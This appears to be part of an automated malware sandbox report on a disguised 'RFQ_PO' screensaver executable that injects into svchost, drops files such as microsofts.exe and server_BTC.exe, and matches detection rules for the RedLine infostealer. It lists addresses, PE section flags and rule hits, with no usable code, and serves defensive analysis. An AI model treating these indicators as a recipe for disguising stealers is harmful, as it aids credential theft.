Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0040F890	2_2_0040F890
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0042397B	2_2_0042397B
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00411B63	2_2_00411B63
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00423EBF	2_2_00423EBF
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_056A1A68	2_2_056A1A68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052BD580	3_2_052BD580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_05287F80	3_2_05287F80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052B3780	3_2_052B3780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052BC7F0	3_2_052BC7F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052C39A3	3_2_052C39A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052B5980	3_2_052B5980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_05286EAF	3_2_05286EAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052851EE	3_2_052851EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_052C00D9	3_2_052C00D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_05287B6C	3_2_05287B6C
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Code function: 4_3_006A0C8C	4_3_006A0C8C
Source: C:\Windows\System32\alg.exe	Code function: 6_2_0071A810	6_2_0071A810
Source: C:\Windows\System32\alg.exe	Code function: 6_2_006F7C00	6_2_006F7C00
Source: C:\Windows\System32\alg.exe	Code function: 6_2_00722D40	6_2_00722D40
Source: C:\Windows\System32\alg.exe	Code function: 6_2_006F79F0	6_2_006F79F0
Source: C:\Windows\System32\alg.exe	Code function: 6_2_0071EEB0	6_2_0071EEB0
Source: C:\Windows\System32\alg.exe	Code function: 6_2_007192A0	6_2_007192A0
Source: C:\Windows\System32\alg.exe	Code function: 6_2_007193B0	6_2_007193B0
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B8A810	10_2_00B8A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B67C00	10_2_00B67C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B679F0	10_2_00B679F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B92D40	10_2_00B92D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B8EEB0	10_2_00B8EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B892A0	10_2_00B892A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B893B0	10_2_00B893B0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_0099DC74	11_2_0099DC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068EC3F8	11_2_068EC3F8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068E6A28	11_2_068E6A28
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068EB7F0	11_2_068EB7F0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068E9720	11_2_068E9720
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068E7F60	11_2_068E7F60
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068E3E1A	11_2_068E3E1A
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 11_2_068E3E28	11_2_068E3E28
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 12_2_024E85C8	12_2_024E85C8
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 12_2_024E85B7	12_2_024E85B7
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DDA810	15_2_00DDA810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DB7C00	15_2_00DB7C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DB79F0	15_2_00DB79F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DE2D40	15_2_00DE2D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DDEEB0	15_2_00DDEEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DD92A0	15_2_00DD92A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DD93B0	15_2_00DD93B0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 00425210 appears 56 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 0041718C appears 88 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: String function: 0043362D appears 38 times

Source: chrmstp.exe.4.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.4.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: setup.exe.4.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.4.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression

Source: elevation_service.exe.4.dr	Static PE information: Number of sections : 12 > 10
Source: notification_helper.exe.4.dr	Static PE information: Number of sections : 13 > 10
Source: chrmstp.exe.4.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe0.4.dr	Static PE information: Number of sections : 12 > 10
Source: chrome_proxy.exe.4.dr	Static PE information: Number of sections : 12 > 10
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe.4.dr	Static PE information: Number of sections : 14 > 10

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720413615.0000000003AD3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720096215.0000000003C7D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1753278663.0000000004133000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1752650308.000000000405D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.svchost.exe.5c00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1767717625.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: armsvc.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
